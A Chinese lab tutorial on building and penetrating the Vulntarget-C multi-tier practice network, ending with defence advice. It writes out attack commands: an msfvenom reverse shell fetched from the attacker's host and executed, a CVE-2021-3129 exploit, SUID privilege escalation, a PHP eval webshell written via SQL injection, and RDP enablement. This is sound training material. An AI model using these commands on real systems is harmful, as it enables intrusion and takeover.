Vulntarget漏洞靶场系列(三) - Vulntarget-C 渗透测试教学文档<\/h1>

靶场概述<\/h2>
Vulntarget-C是一个多层网络环境的渗透测试靶场，包含以下主要组件：<\/p>
外网Ubuntu 20.04服务器（运行Laravel 8.4.2）<\/li>
内网Windows Server 2016（运行OVAS-PHP CMS）<\/li>
更深层内网Ubuntu 16.04服务器<\/li> <\/ul>
靶场搭建指南<\/h2>

1. 外网Ubuntu 20.04配置<\/h3>

1.1 基础环境<\/h4>
镜像来源：阿里云Ubuntu 20.04镜像<\/li>
网络配置：双网卡（桥接模式）
ens33: 192.168.0.104\/24<\/li>
ens38: 10.0.20.141\/24<\/li> <\/ul> <\/li>
设置root密码：sudo passwd root<\/code> (密码：root#qwe)<\/li>
允许SSH远程登录：修改\/etc\/ssh\/sshd_config<\/code><\/li>
<\/ul>
1.2 Laravel环境搭建<\/h4>


安装PHP 7.4.3：<\/p>
apt-get update
<\/span><\/span>apt install php7.4-cli
<\/span><\/span><\/code><\/pre><\/li>

安装Composer 2.0.8：<\/p>
php -r "copy('https:\/\/getcomposer.org\/installer', 'composer-setup.php');"<\/span>
<\/span><\/span>php composer-setup.php --version=<\/span>2.0.8
<\/span><\/span>php -r "unlink('composer-setup.php');"<\/span>
<\/span><\/span>mv composer.phar \/usr\/bin\/composer
<\/span><\/span><\/code><\/pre><\/li>

配置阿里云Composer源：<\/p>
composer config -g repo.packagist composer https:\/\/mirrors.aliyun.com\/composer\/
<\/span><\/span><\/code><\/pre><\/li>

安装Laravel 8.4.2：<\/p>
composer -vvv install
<\/span><\/span>sudo chmod -R 777<\/span> laravel-8.4.2
<\/span><\/span><\/code><\/pre><\/li>

安装漏洞插件：<\/p>
composer require facade\/ignition==<\/span>2.5.1
<\/span><\/span><\/code><\/pre><\/li>

配置环境：<\/p>
cp .env.example .env
<\/span><\/span>php artisan key:generate
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.3 Apache配置<\/h4>


安装Apache和PHP解析：<\/p>
sudo apt-get install apache2
<\/span><\/span>sudo apt install libapache2-mod-php7.4
<\/span><\/span><\/code><\/pre><\/li>

修改配置文件\/etc\/apache2\/apache2.conf<\/code>：<\/p>
<Directory<\/span> \/var\/www\/<\/span>><\/span>
<\/span><\/span>    Options Indexes FollowSymLinks
<\/span><\/span>    AllowOverride all<\/span>
<\/span><\/span>    Require all<\/span> granted
<\/span><\/span><\/Directory><\/span>
<\/span><\/span>IncludeOptional mods-available\/php7.4.load
<\/span><\/span>IncludeOptional mods-available\/php7.4.conf
<\/span><\/span><\/code><\/pre><\/li>

启用rewrite模块：<\/p>
sudo a2enmod rewrite
<\/span><\/span>sudo systemctl restart apache2
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.4 提权配置<\/h4>

编辑\/etc\/sudoers<\/code>文件：
vulntarget ALL=(<\/span>ALL:ALL)<\/span> NOPASSWD:\/usr\/bin\/python3 \/opt\/root.py
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. Windows Server 2016配置<\/h3>
2.1 XAMPP安装<\/h4>

版本：XAMPP for Windows<\/li>
安装路径：C:\xampp<\/li>
<\/ul>
2.2 OVAS-PHP CMS安装<\/h4>

解压CMS到C:\xampp\htdocs\ovas<\/li>
创建数据库ovas_db<\/li>
导入SQL文件：C:\xampp\htdocs\ovas\database\ovas_db.sql<\/li>
后台登录凭证：admin\/admin123<\/li>
<\/ol>
3. Ubuntu 16.04配置<\/h3>

网络配置：静态IP<\/li>
SSH服务安装与配置<\/li>
<\/ul>
渗透测试过程<\/h2>
1. 外网渗透<\/h3>
1.1 信息收集<\/h4>

目标IP：10.30.7.51<\/li>
开放端口：22(SSH)、80(HTTP)<\/li>
Web框架：Laravel<\/li>
<\/ul>
1.2 Laravel漏洞利用(CVE-2021-3129)<\/h4>


下载利用工具：<\/p>
git clone https:\/\/github.com\/SNCKER\/CVE-2021-3129
<\/span><\/span>cd CVE-2021-3129
<\/span><\/span>git clone https:\/\/github.com\/ambionics\/phpggc.git
<\/span><\/span><\/code><\/pre><\/li>

修改exploit.py脚本：<\/p>

设置目标IP<\/li>
添加反弹shell命令<\/li>
<\/ul>
<\/li>

执行攻击：<\/p>
python3 exploit.py
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.3 获取初始立足点<\/h4>


生成Linux反向shell：<\/p>
msfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span>4444<\/span> -f elf -o shell.elf
<\/span><\/span><\/code><\/pre><\/li>

目标机下载执行：<\/p>
cd \/var\/www\/html\/public
<\/span><\/span>wget http:\/\/<攻击机IP>:9999\/shell.elf
<\/span><\/span>chmod 777<\/span> shell.elf
<\/span><\/span>.\/shell.elf
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.4 提权<\/h4>


发现sudo提权漏洞：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre><\/li>

利用\/opt\/root.py提权：<\/p>
sudo \/usr\/bin\/python3 \/opt\/root.py
<\/span><\/span><\/code><\/pre><\/li>

在另一个终端连接：<\/p>
nc localhost 12345<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发pdb调试模式后执行：<\/p>
import<\/span> os
<\/span><\/span>os.<\/span>system("chmod u+s \/bin\/bash"<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. 内网横向移动<\/h3>
2.1 信息收集<\/h4>

发现内网网段：10.0.20.0\/24<\/li>
存活主机：10.0.20.100（开放80、443）<\/li>
<\/ul>
2.2 OVAS-PHP后台爆破<\/h4>

使用Burp Suite爆破登录：

路径：\/classes\/Login.php?f=login<\/li>
成功凭证：admin\/admin123<\/li>
<\/ul>
<\/li>
<\/ol>
2.3 SQL注入获取Webshell<\/h4>


使用sqlmap通过代理扫描：<\/p>
sqlmap -r request.txt --proxy=<\/span>socks:\/\/<代理IP>:8888
<\/span><\/span><\/code><\/pre><\/li>

写入一句话木马：<\/p>
echo ^<^?php $a =<\/span> $_REQUEST[<\/span>'d'<\/span>]<\/span>;$a =<\/span> "<\/span>$a"<\/span>;$b[<\/span>'test'<\/span>]<\/span> =<\/span> ""<\/span>;eval(<\/span>$b[<\/span>'test'<\/span>]<\/span>."<\/span>$a"<\/span>)<\/span>;?^> > test.php
<\/span><\/span><\/code><\/pre><\/li>

使用蚁剑连接<\/p>
<\/li>
<\/ol>
2.4 免杀上线MSF<\/h4>

生成免杀payload绕过Windows Defender<\/li>
上传并执行payload<\/li>
<\/ol>
2.5 远程桌面连接<\/h4>


抓取密码哈希并破解：<\/p>

密码：Admin#123<\/li>
<\/ul>
<\/li>

开启远程桌面：<\/p>
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"<\/span> \/t REG_DWORD \/v portnumber \/d 3389 \/f
<\/span><\/span>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
<\/span><\/span>netsh advfirewall firewall add rule name="Remote Desktop"<\/span> protocol=TCP dir=in localport=3389 action=allow
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 深层内网渗透<\/h3>
3.1 发现新网段<\/h4>

10.0.10.0\/24<\/li>
存活主机：10.0.10.110<\/li>
<\/ul>
3.2 Ubuntu 16.04提权<\/h4>

使用CVE-2021-3493提权：
# 编译并上传exp<\/span>
<\/span><\/span>chmod +x exp
<\/span><\/span>.\/exp
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
关键漏洞总结<\/h2>


Laravel RCE (CVE-2021-3129)<\/strong><\/p>

影响版本：Laravel <= 8.4.2 + Ignition <= 2.5.1<\/li>
利用方式：通过恶意日志文件实现RCE<\/li>
<\/ul>
<\/li>

OVAS-PHP漏洞<\/strong><\/p>

弱口令：admin\/admin123<\/li>
SQL注入导致getshell<\/li>
<\/ul>
<\/li>

提权漏洞<\/strong><\/p>

Ubuntu 20.04：配置不当的sudo权限<\/li>
Ubuntu 16.04：CVE-2021-3493内核提权<\/li>
<\/ul>
<\/li>

Windows Defender绕过<\/strong><\/p>

需要制作免杀payload<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


Laravel防护：<\/p>

禁用调试模式<\/li>
及时更新到安全版本<\/li>
<\/ul>
<\/li>

OVAS-PHP防护：<\/p>

修改默认凭证<\/li>
修复SQL注入漏洞<\/li>
<\/ul>
<\/li>

系统安全：<\/p>

限制sudo权限<\/li>
及时更新内核补丁<\/li>
配置强密码策略<\/li>
<\/ul>
<\/li>

网络防护：<\/p>

网络隔离<\/li>
限制不必要的端口和服务<\/li>
<\/ul>
<\/li>
<\/ol>
本教学文档详细记录了Vulntarget-C靶场的搭建过程和渗透测试方法，涵盖了从外网打点到内网横向移动的全过程，重点突出了关键漏洞的利用方式和防御措施。<\/p>